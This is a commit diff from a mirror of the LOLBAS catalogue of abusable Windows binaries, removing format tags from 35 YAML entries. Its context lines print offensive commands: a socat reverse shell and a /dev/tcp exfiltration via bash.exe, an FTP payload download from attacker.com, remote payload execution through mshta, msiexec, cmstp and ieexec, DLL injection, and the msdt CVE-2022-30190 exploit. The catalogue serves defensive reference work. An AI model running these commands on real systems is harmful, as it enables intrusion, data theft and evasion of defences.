public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-29 00:08:11 +01:00
Code Issues Projects Releases Wiki Activity

Removed Fixed and Custom Format tags

Browse Source
This commit is contained in:
Hegusung 2024-10-13 18:01:58 +02:00
parent 75d04eaf72
commit e07907c473
35 changed files with 0 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
yml/OSBinaries/Addinutil.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: .NetObjets
- Input: Fixed Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

1
yml/OSBinaries/At.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 7 or older
Tags:
- Execute: EXE
- Input: Custom Format
Full_Path:
- Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe

1
yml/OSBinaries/Atbroker.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe

4
yml/OSBinaries/Bash.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -33,7 +31,6 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -43,7 +40,6 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe

1
yml/OSBinaries/Certoc.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Input: Custom Format
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.

2
yml/OSBinaries/Cmstp.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
- Input: Custom Format
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: INF
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe

2
yml/OSBinaries/Conhost.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
Full_Path:
- Path: c:\windows\system32\conhost.exe
Detection:

2
yml/OSBinaries/Control.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe

1
yml/OSBinaries/Cscript.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe

1
yml/OSBinaries/CustomShellHost.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Fixed Format
Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe
Detection:

1
yml/OSBinaries/Dfsvc.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: ClickOnce
- Execute: Remote
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

2
yml/OSBinaries/Diskshadow.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Input: Custom Format
- Command: diskshadow> exec calc.exe
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe

1
yml/OSBinaries/Dnscmd.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe

1
yml/OSBinaries/Esentutl.yml
View File

@ -46,7 +46,6 @@ Commands:
Privileges: Admin
MitreID: T1003.003
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe

2
yml/OSBinaries/Explorer.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe

1
yml/OSBinaries/Extexport.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe

2
yml/OSBinaries/Forfiles.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe

1
yml/OSBinaries/Fsutil.yml
View File

@ -27,7 +27,6 @@ Commands:
OperatingSystem: Windows 11
Tags:
- Execute: EXE
- Input: Fixed Format
Full_Path:
- Path: C:\Windows\System32\fsutil.exe
- Path: C:\Windows\SysWOW64\fsutil.exe

1
yml/OSBinaries/Ftp.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Input: Custom Format
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.

2
yml/OSBinaries/Gpscript.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Input: Fixed Format
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Input: Fixed Format
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe

2
yml/OSBinaries/Hh.yml
View File

@ -20,7 +20,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Input: Custom Format
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
@ -32,7 +31,6 @@ Commands:
- Execute: CMD
- Execute: CHM
- Execute: Remote
- Input: Custom Format
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe

1
yml/OSBinaries/Ie4uinit.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
- Input: Fixed Format
Full_Path:
- Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe

1
yml/OSBinaries/Iediagcmd.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
Tags:
- Execute: EXE
- Input: Fixed Format
Full_Path:
- Path: C:\Program Files\Internet Explorer\iediagcmd.exe
Detection:

2
yml/OSBinaries/Ieexec.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: Remote
- Execute: .NetEXE
- Input: Custom Format
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
@ -25,7 +24,6 @@ Commands:
Tags:
- Execute: Remote
- Execute: .NetEXE
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

1
yml/OSBinaries/Infdefaultinstall.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

2
yml/OSBinaries/Installutil.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: .NetDLL
- Execute: .NetEXE
- Input: Custom Format
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
@ -25,7 +24,6 @@ Commands:
Tags:
- Execute: .NetDLL
- Execute: .NetEXE
- Input: Custom Format
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

2
yml/OSBinaries/Mavinject.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe

3
yml/OSBinaries/Microsoft.Workflow.Compiler.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: VB.Net
- Execute: Csharp
- Input: Custom Format
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@ -25,7 +24,6 @@ Commands:
Tags:
- Execute: VB.Net
- Execute: Csharp
- Input: Custom Format
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@ -36,7 +34,6 @@ Commands:
Tags:
- Execute: VB.Net
- Execute: Csharp
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:

1
yml/OSBinaries/Mmc.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.

5
yml/OSBinaries/Msbuild.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Csharp
- Input: Custom Format
- Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
@ -23,7 +22,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Csharp
- Input: Custom Format
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL
@ -33,7 +31,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
@ -43,7 +40,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Input: Custom Format
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
@ -53,7 +49,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe

1
yml/OSBinaries/Msconfig.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\msconfig.exe
Code_Sample:

3
yml/OSBinaries/Msdt.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Application: GUI
- Execute: MSI
- Input: Custom Format
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
@ -25,7 +24,6 @@ Commands:
Tags:
- Application: GUI
- Execute: MSI
- Input: Custom Format
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting
@ -36,7 +34,6 @@ Commands:
Tags:
- Application: GUI
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe

1
yml/OSBinaries/Msedge.yml
View File

@ -27,7 +27,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path:
- Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
- Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

1
yml/OSBinaries/Mshta.yml
View File

@ -14,7 +14,6 @@ Commands:
Tags:
- Execute: WSH
- Execute: Remote
- Input: Custom Format
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code

5
yml/OSBinaries/Msiexec.yml
View File

@ -13,7 +13,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Input: Custom Format
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
@ -24,7 +23,6 @@ Commands:
Tags:
- Execute: MSI
- Execute: Remote
- Input: Custom Format
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
@ -35,7 +33,6 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Input: Custom Format
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
@ -46,7 +43,6 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Input: Custom Format
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@ -56,7 +52,6 @@ Commands:
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Input: Custom Format
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe